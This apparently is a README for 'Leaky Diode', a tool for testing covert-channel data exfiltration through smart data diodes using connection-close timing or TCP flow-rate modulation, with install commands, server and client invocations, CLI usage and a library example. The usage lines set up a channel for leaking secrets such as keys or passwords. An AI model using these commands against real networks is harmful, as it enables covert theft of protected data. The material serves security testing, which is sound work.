Leaky diode is a data exfiltration test tool for smart data diodes, that is data diodes with support for TCP pass-through with the help of some side channel from the isolated side. The attacks used are flow modulation and/or close delay:
CLOSE DELAY uses the delay between the request of one the secret's bits and the time the server closes the connection to encode the bit value. (i.e.- 10 seconds delay means a 0, 30 seconds delay a 1)
FLOW MODULATION uses tcp flow control mechanism to encode secret's bits as a transfer speed. For example if the the bit requested by the client is 1 the server throttles the speed to 300KB/s, if it's 0 to 100KB/s. The advantage of this attack is that using a single connection makes it harder to detect.
Download the package or clone the repository, and then install with:
python3 setup.py install
or use pypi:
pip3 install leaky_diode --user
sudo pip3 install leaky_diode
the path to the scripts if not installed as root will be:
On the isolated side launch the server:
leaky_server public_ip port 'secret string that needs leaking'
On the untrusted side launch the client and select one of the attacks,
leaky_client server_ip server_port --mode flow --partial
leaky_client server_ip server_port --mode close --partial
And just wait a few minutes to receive the first byte (it's the slowest), if you're not sure if it's working add --verbose option so it prints messages on each received bit.
usage: leaky_client [-h] [--mode mode] [--low_delay delay] [--high_delay delay] [--low_rate rate] [--high_rate rate] [--sample_time time] [--settle_time time] [--partial] host port Leaky Diode is a data exfiltration test tool for data diodes positional arguments: host Remore host address port Remote host port optional arguments: -h, --help Show this help message and exit --mode mode, -m mode Attack mode 'flow' or 'close' (default: flow) --low_delay delay Close delay for low bits (default: 5s) (only Close Mode) --high_delay delay Close delay for high bits (default: 10s) (only Close Mode) --low_rate rate Tx rate for low bits (default: 64 KB/s) (only Flow Mode) --high_rate rate Tx rate for high bits (default: 300 KB/s) (only Flow Mode) --sample_time time Tx rate sampling interval (default: 3.0s) (only Flow Mode) --settle_time time Settle time between sending a bit request and the start of sampling (default: 8.0s) (only Flow Mode) --partial Show partial results each time another byte from the secret is received --verbose Show debugging messages
usage: leaky_server [-h] host port secret_string Leaky Diode is a data exfiltration test tool for data diodes positional arguments: host Remore host address port Remote host port secret_string Attack mode 'flow' or 'close' (default: a secret string) optional arguments: -h, --help Show this help message and exit -v, --verbose Show debugging messages
The attack throughput with the default parameters is around 1 B/min (yes, one byte per minute), you can increase it by lowering the delay times in close delay mode, and the settle/sample times in flow modulation (the default values are very conservative)
An actual exfiltration attempt using this attack could easily leak a few KB per day, too slow for large breachs, but enough for targeted attacks for keys/passwords or selected users data.
It is also possible to use leaky_diode as a package and include a server in your own app:
class LeakyServer(host, port, secret, ticks=100, max_connections=10)
host: (str) Listen interface ip addres ('' for all)
port: (int) Listen port
secret: (bytes) Secret to leak (max length 65535)
ticks: (int) Ticks per second the worker process use to throttle the connections.
max_connections: (int) Max concurrent connection the server can handle.
start(): Initialize and launch server worker processes
stop(): Stop server and its workers
from leaky_diode import LeakyServer leaky_server = LeakyServer('192.168.0.10', 9000, b'some secret byte string') leaky_server.start() # Do something else ...... # Close server before exit leaky_server.close()
- Harden message parsing input validation (invalid lengths)
- Use concurrent connection to increase exfiltration speed.
- Tune flow modulation mode tx speeds .
- Tune close delay mode delays.
- Add CRC to the secret and secret length, or even better error correction.
- Add resume capability so there is no need to get the secret in one go.
- Add some tests.
- Data Diodes Wikipedia
- Place holder so I remember to publish a post on the attacks
- And another on transport and streaming protocols for data diodes